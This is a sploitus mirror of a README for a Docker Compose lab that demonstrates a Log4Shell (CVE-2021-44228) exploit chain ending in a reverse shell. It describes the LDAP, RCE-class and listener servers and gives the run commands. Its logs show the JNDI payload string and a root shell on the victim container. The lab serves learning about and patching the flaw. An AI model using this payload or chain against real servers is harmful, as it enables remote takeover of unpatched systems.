Share
## https://sploitus.com/exploit?id=54FE5E76-EAF4-5D84-B37F-06F12A6AFF71
# Self-contained lab environment PoC that runs a reverse-shell with Log4Shell (CVE-2021-44228)

This is a self-contained lab environment that runs the exploit safely, all from docker compose.

The affected versions are **Apache Log4j <=2.0โ€“2.14.1** and the CVE is tracked as **CVE-2021-44228** (CVSS score: 10.0).

### Do patch Apache Log4j to version 2.16+ asap !!!

## Prerequisites

This code requires Docker and Docker Compose.

## Description
`Dockerfile` and `docker-compose.yml` files are self-explanatory to build and start the lab environment.

Victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server) is built using [spring initializr](https://start.spring.io) demo project, including Log4j 2.14.1 vulnerable version through [spring-boot-starter-log4j2 2.6.1](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/build.gradle#L19).

The vulnerable code is located inside [DemoApplication.java](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/src/main/java/com/example/demo/DemoApplication.java#L29).

[Remote Code Execution](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/rce-server/src/ReverseShell.java#L8) is served by the [rce-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/rce-server).

Intermediate [LDAP server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/ldap-server) is based on [Java Unmarshaller Security - Turning your data into code execution](https://github.com/mbechler/marshalsec).

Attack vector is performed from [this script](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/attack-vector/attack-vector.sh#L13) to setup a connection to the [reverse-shell](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) server.

[Reverse-shell server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) waits for a connection, and sends a [command example](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/reverse-shell/reverse-shell.sh#L3) `echo $(whoami)` through the reverse shell, which is executed on the victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server).


## Usage:

```bash
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
```

```
ldap-server       | Listening on 0.0.0.0:1389
```
LDAP server ready and listening.

```
reverse-shell     | listening on [::]:4242 ...
```
Reverse-shell server ready and listening.

```
log4shell-server  |
log4shell-server  |   .   ____          _            __ _ _
log4shell-server  |  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
log4shell-server  | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server  |  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
log4shell-server  |   '  |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server  |  =========|_|==============|___/=/_/_/_/
log4shell-server  |  :: Spring Boot ::                (v2.6.1)
log4shell-server  |
log4shell-server  | 2021-12-18 12:31:37.695  INFO 1 --- [           main] c.e.d.DemoApplication                    : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server  | 2021-12-18 12:31:37.739  INFO 1 --- [           main] c.e.d.DemoApplication                    : No active profile set, falling back to default profiles: default
log4shell-server  | 2021-12-18 12:31:42.337  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat initialized with port(s): 8080 (http)
log4shell-server  | 2021-12-18 12:31:42.439  INFO 1 --- [           main] o.a.c.c.StandardService                  : Starting service [Tomcat]
log4shell-server  | 2021-12-18 12:31:42.440  INFO 1 --- [           main] o.a.c.c.StandardEngine                   : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server  | 2021-12-18 12:31:42.717  INFO 1 --- [           main] o.a.c.c.C.[.[.[/]                        : Initializing Spring embedded WebApplicationContext
log4shell-server  | 2021-12-18 12:31:42.718  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server  | 2021-12-18 12:31:44.660  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
```
Vulnerable server ready and listening.

```
attack-vector     | ๐Ÿ‘Œ log4shell-server:8080 is listening!
attack-vector     | ๐Ÿš€ Sending attack vector ...
```
Attack server waiting connection and sending the attack-vector.

```
log4shell-server  | 2021-12-18 12:31:44.740  INFO 1 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/]                        : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.112  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 2 ms
ldap-server       | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server        | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
```
Vulnerable server executing request, logging it, so LDAP server is requesting RCE to the RCE server.

```
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell     | ๐Ÿ‘ป Hello from the log4shell-server! We are root.
reverse-shell     | listening on [::]:4242 ...
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
```
RCE is executed and victim server is opening the reverse shell, and reverse-shell server is able to execute execute distant commands.

```
log4shell-server  | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello  param:name: ReverseShell@22fb868
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:host: log4shell-server:8080
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:user-agent: curl/7.80.0
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:accept: */*
```
Victim server is logging the attack vector request.

```
attack-vector     | ๐Ÿ”ฅ Server returned:
attack-vector     | > HTTP/1.1 200
attack-vector     | > Content-Type: text/plain;charset=UTF-8
attack-vector     | > Content-Length: 52
attack-vector     | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector     | >
attack-vector     | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector     | Attack should be successfull, have a nice day!
```
Attack vector request is logging the response, and leaves the party.

## Disclaimer
This repository is only about learning from the vulnerability.

The project is not intended to be and cannot be used as a malicious exploit of the CVE-2021-44228 without the consentment of victim server's owner.

**Any usage for malicious activity is prohibited and punished by severe laws.**


## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

https://github.com/christophetd/log4shell-vulnerable-app